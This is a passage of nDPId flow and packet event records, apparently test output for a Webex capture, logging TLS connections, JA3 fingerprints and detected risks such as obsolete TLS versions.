-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1444570640338,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640338,"pkt":"ABoRAAACABoRAAABCABFAAA82ZNAAEAGODoKCAABPm3geMe\/Abvolh2LAAAAAKACOQhSCQAAAgQFtAQCCAoATMQYAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1444570640344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640344,"pkt":"ABoRAAACABoRAAABCABFAAAoAflAABAGP+k+beB4CggAAQG7x78XaeJ06JYdjFAS\/\/+9aAAA"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1444570640346,"pkt":"ABoRAAACABoRAAABCABFAABLP\/ZAAEAGY3QKhc4vUEpuRIKzAbsvtI0Fj3ahWYAYAWE\/AgAAAQEICgBMxFRXHeViFQMBABJ8gv9dmaTjHFUtA85jnlaY0C8="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1444570640347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAA0P\/dAAEAGY4oKhc4vUEpuRIKzAbsvtI0cj3ahWYARAWFq6AAAAQEICgBMxFRXHeVi"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1444570640347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAAoAfpAABAG0ZNQSm5ECoXOLwG7grOPdqFZL7SNHVAQ\/\/+mgQAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1444570640348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640348,"pkt":"ABoRAAACABoRAAABCABFAAA8fMFAAEAGd0kKCAABch3Ki7gfAbudV783AAAAAKACOQjtNQAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1444570640356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640356,"pkt":"ABoRAAACABoRAAABCABFAAA8nBlAAEAGTKgKCAABch3V1KMdAbtvG1\/vAAAAAKACOQiEcwAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1444570640365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640365,"pkt":"ABoRAAACABoRAAABCABFAAA8YQpAAEAGkVoKCAABch3MMcncAbvjbaL+AAAAAKACOQiv9QAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1444570640373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640373,"pkt":"ABoRAAACABoRAAABCABFAAA8S49AAEAGO34KCAABQERpYpETAbtLyIh5AAAAAKACOQgvkgAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640382,"flow_last_seen":1444570640382,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640382,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1444570640382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640382,"pkt":"ABoRAAACABoRAAABCABFAAA8O9hAAEAGNk0KCAABUEpuRILnAbv7u\/+DAAAAAKACOQgB2AAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1444570640385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640385,"pkt":"ABoRAAACABoRAAABCABFAAAoAgBAABAGoDlQSm5ECggAAQG7gucERAB8+7v\/hFAS\/\/9imAAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640385,"flow_last_seen":1444570640385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640385,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1444570640385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640385,"pkt":"ABoRAAACABoRAAABCABFAAA8smJAAEAGv8IKCAABUEpuRILoAbtZhnY\/AAAAAKACOQgtTwAAAgQFtAQCCAoATMRdAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1444570640389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAAoAgFAABAGoDhQSm5ECggAAQG7guimeYnAWYZ2QFAS\/\/9ilwAA"} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1444570640389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAA8c3ZAAEAGE5IKCAABQERpZ6GyAbtpybCOAAAAAKACOQjY0wAAAgQFtAQCCAoATMRfAAAAAAEDAwY="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1444570640395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640395,"pkt":"ABoRAAACABoRAAABCABFAAA8tGlAAEAGXWQKCAABPm3geMe+AbssX3BwAAAAAKACOQi6+AAAAgQFtAQCCAoATMR8AAAAAAEDAwY="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1444570640399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640399,"pkt":"ABoRAAACABoRAAABCABFAAA82ZRAAEAGODkKCAABPm3geMe\/Abvolh2LAAAAAKACOQhRpAAAAgQFtAQCCAoATMR9AAAAAAEDAwY="} 
-00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640407,"pkt":"ABoRAAACABoRAAABCABFAAAoO9lAAEAGNmAKCAABUEpuRILnAbv7u\/+EBEQAfVAQOQgpkQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640408,"pkt":"ABoRAAACABoRAAABCABFAAAosmNAAEAGv9UKCAABUEpuRILoAbtZhnZApnmJwVAQOQgpkAAA"} 
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01472{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}} 
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669736,"flow_last_seen":1444570669736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669736,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1444570669736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669736,"pkt":"ABoRAAACABoRAAABCABFAAA80OhAAEAGQOUKCAABPm3geMfSAbvlsh8HAAAAAKACOQhHhwAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1444570669745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAAoAiJAABAGP8A+beB4CggAAQG7x9IaTeD45bIfCFAS\/\/+9VQAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570669745,"flow_last_seen":1444570669745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570669745,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1444570669745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570669745,"pkt":"ABoRAAACABoRAAABCABFAAA8QwJAAEAGzssKCAABPm3geMfTAbvSW4ztAAAAAKACOQjs9gAAAgQFtAQCCAoATM\/vAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAoAiNAABAGP78+beB4CggAAQG7x9MtpHMS0luM7lAS\/\/+9VAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669760,"pkt":"ABoRAAACABoRAAABCABFAAAo0OlAAEAGQPgKCAABPm3geMfSAbvlsh8IGk3g+VAQOQiETgAA"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669736,"flow_last_seen":1444570669760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669760,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
